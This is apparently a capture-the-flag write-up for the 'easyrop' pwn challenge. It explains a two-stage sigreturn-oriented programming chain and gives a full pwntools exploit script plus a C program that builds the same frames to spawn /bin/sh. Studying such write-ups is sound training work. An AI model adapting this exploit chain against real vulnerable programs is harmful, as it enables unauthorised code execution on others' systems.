DJBCTF pwn reproduction

    I went to act in a movie for my friend, so I didn't play DJBCTF.

    easyrop

    SROP: https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/#_6

    gadget: pop rax; syscall; ret at 0x4000DB. Because pop rax is a single-byte instruction, entering the same gadget one byte later (0x4000DC) gives a plain syscall; ret.

    buf (0x6000E0) can serve as a fake stack for the chain: debugging in gdb shows the .data section is writable. The plan is two sigreturn frames. After 0x40 bytes of padding the return address is overwritten with pop rax; syscall; ret, rax is set to 15 (rt_sigreturn), and the first frame makes the kernel run read(0, buf, 0x400) with rsp pivoted to buf; the ret after that syscall then continues from whatever the read just wrote. The second stage, delivered by that read, repeats the trick with a frame for execve on a "/bin/sh" string placed at buf + 0x180.

    Exp:

    from pwn import *

    local = 1

    binary = "./easyrop"

    context.arch = 'amd64'
    context.os = 'linux'
    context.terminal = ['tmux', 'splitw', '-h']

    def dbg():
        context.log_level = 'debug'

    if local == 1:
        p = process(binary)

    dbg()

    buf = 0x6000E0                  # writable .data, used as the fake stack
    pop_rax_syscall_ret = 0x4000DB  # pop rax; syscall; ret
    syscall_ret = 0x4000DC          # syscall; ret (same gadget, past the pop)

    # Stage 1: pop rax = 15 (rt_sigreturn), then a frame that performs
    # read(0, buf, 0x400) and pivots rsp to buf. The ret following the
    # syscall pops buf[0], so execution continues from what stage 2 writes.
    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_read
    sigframe.rdi = 0
    sigframe.rsi = buf
    sigframe.rdx = 0x400
    sigframe.rsp = buf
    sigframe.rip = syscall_ret

    # bytes(sigframe) rather than str(sigframe): str() gives a repr under Python 3 pwntools
    payload = b'a' * 0x40 + p64(pop_rax_syscall_ret) + p64(15) + bytes(sigframe)

    p.recvuntil(b'Welcome to DJB easyrop!')
    p.send(payload)

    # Stage 2 (lands at buf): same gadget and rax = 15, then a frame for
    # execve(buf + 0x180, 0, 0); "/bin/sh\0" is placed exactly at buf + 0x180.
    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_execve
    sigframe.rdi = buf + 0x180
    sigframe.rsi = 0
    sigframe.rdx = 0
    sigframe.rsp = buf
    sigframe.rip = syscall_ret

    payload = p64(pop_rax_syscall_ret) + p64(15) + bytes(sigframe)
    payload = payload.ljust(0x180, b'a') + b'/bin/sh\x00'
    p.send(payload)

    p.interactive()
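To make the frame layout concrete, here is an added example (my own code, not from the writeup) that builds the same 248-byte amd64 rt_sigreturn frame by hand, using the qword offsets pwntools' SigreturnFrame() emits, and assembles both easyrop stages from the addresses above. The helper names (srop_frame, build_stage1, build_stage2, frame_reg, get64) are mine; the addresses and the 0x180 string offset are the writeup's. It is in C rather than Python so that the byte layout and the arithmetic are explicit:

```c
/* x86-64 SROP frame builder mirroring pwntools' SigreturnFrame() (amd64),
 * plus the two easyrop stages from the writeup above.
 * Added example, not part of the original post; addresses are the writeup's. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Qword slots of the frame rt_sigreturn pops from rsp: struct ucontext
 * (uc_flags, uc_link, uc_stack) followed by struct sigcontext. The kernel
 * restores every general-purpose register, rip and rsp from it. */
enum frame_slot {
    UC_FLAGS, UC_LINK, SS_SP, SS_FLAGS, SS_SIZE,
    R8, R9, R10, R11, R12, R13, R14, R15,
    RDI, RSI, RBP, RBX, RDX, RAX, RCX, RSP, RIP,
    EFLAGS, CSGSFS, ERR, TRAPNO, OLDMASK, CR2, FPSTATE, RESERVED, SIGMASK,
    FRAME_QWORDS
};
#define FRAME_LEN (FRAME_QWORDS * 8)   /* 248 bytes, same as pwntools */
#define USER_CS   0x33                 /* 64-bit user code selector; pwntools sets csgsfs to this */

/* x86-64 syscall numbers and the writeup's addresses */
#define SYS_READ_X64        0
#define SYS_RT_SIGRETURN    15
#define SYS_EXECVE_X64      59
#define BUF                 0x6000E0UL  /* writable .data, used as the fake stack */
#define POP_RAX_SYSCALL_RET 0x4000DBUL  /* pop rax; syscall; ret */
#define SYSCALL_RET         0x4000DCUL  /* syscall; ret */
#define BINSH_OFF           0x180       /* where "/bin/sh" lands inside buf */

static void put64(uint8_t *p, uint64_t v) {            /* little-endian p64() */
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}
uint64_t get64(const uint8_t *p) {                     /* little-endian u64() */
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Fill a frame that makes rt_sigreturn "return" into rip with the given
 * argument registers and stack pointer. Everything else is zero except cs. */
void srop_frame(uint8_t out[FRAME_LEN], uint64_t rax, uint64_t rdi,
                uint64_t rsi, uint64_t rdx, uint64_t rsp, uint64_t rip) {
    memset(out, 0, FRAME_LEN);
    put64(out + RAX * 8, rax);
    put64(out + RDI * 8, rdi);
    put64(out + RSI * 8, rsi);
    put64(out + RDX * 8, rdx);
    put64(out + RSP * 8, rsp);
    put64(out + RIP * 8, rip);
    put64(out + CSGSFS * 8, USER_CS);
}

uint64_t frame_reg(const uint8_t *frame, enum frame_slot s) {
    return get64(frame + s * 8);
}

/* Stage 1: 0x40 bytes of padding, then pop rax (=15); syscall -> rt_sigreturn
 * -> read(0, buf, 0x400) with rsp pivoted to buf. The ret after that syscall
 * pops buf[0], so execution continues from whatever stage 2 writes there. */
size_t build_stage1(uint8_t *out, size_t cap) {
    size_t n = 0x40 + 8 + 8 + FRAME_LEN;
    if (cap < n) return 0;
    memset(out, 'a', 0x40);
    put64(out + 0x40, POP_RAX_SYSCALL_RET);
    put64(out + 0x48, SYS_RT_SIGRETURN);
    srop_frame(out + 0x50, SYS_READ_X64, 0, BUF, 0x400, BUF, SYSCALL_RET);
    return n;
}

/* Stage 2 (lands at buf): same gadget, a frame for execve(buf+0x180, 0, 0),
 * padding, then "/bin/sh\0" exactly at buf+0x180. Gadget + frame is 0x108
 * bytes, so the string does not overlap the frame. */
size_t build_stage2(uint8_t *out, size_t cap) {
    size_t n = BINSH_OFF + 8;
    if (cap < n) return 0;
    put64(out, POP_RAX_SYSCALL_RET);
    put64(out + 8, SYS_RT_SIGRETURN);
    srop_frame(out + 16, SYS_EXECVE_X64, BUF + BINSH_OFF, 0, 0, BUF, SYSCALL_RET);
    memset(out + 16 + FRAME_LEN, 'a', BINSH_OFF - 16 - FRAME_LEN);
    memcpy(out + BINSH_OFF, "/bin/sh\0", 8);
    return n;
}

int main(void) {
    uint8_t s1[512], s2[512];
    size_t n1 = build_stage1(s1, sizeof s1), n2 = build_stage2(s2, sizeof s2);
    printf("stage1 %zu bytes, frame rip=%#lx rsp=%#lx\n", n1,
           (unsigned long)frame_reg(s1 + 0x50, RIP), (unsigned long)frame_reg(s1 + 0x50, RSP));
    printf("stage2 %zu bytes, execve path at buf+%#x = %s\n", n2, BINSH_OFF, (char *)s2 + BINSH_OFF);
    return 0;
}
```

Two things worth checking against the pwntools script when debugging a chain like this: the rsp field of the first frame must equal the buffer the read fills (otherwise the ret after the syscall returns into garbage), and the rdi of the execve frame must point past the end of the gadget-plus-frame prefix of stage 2, which is why 0x180 works while anything below 0x108 would overwrite the frame itself.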
    
    Original: https://www.cnblogs.com/lemon629/p/14335913.html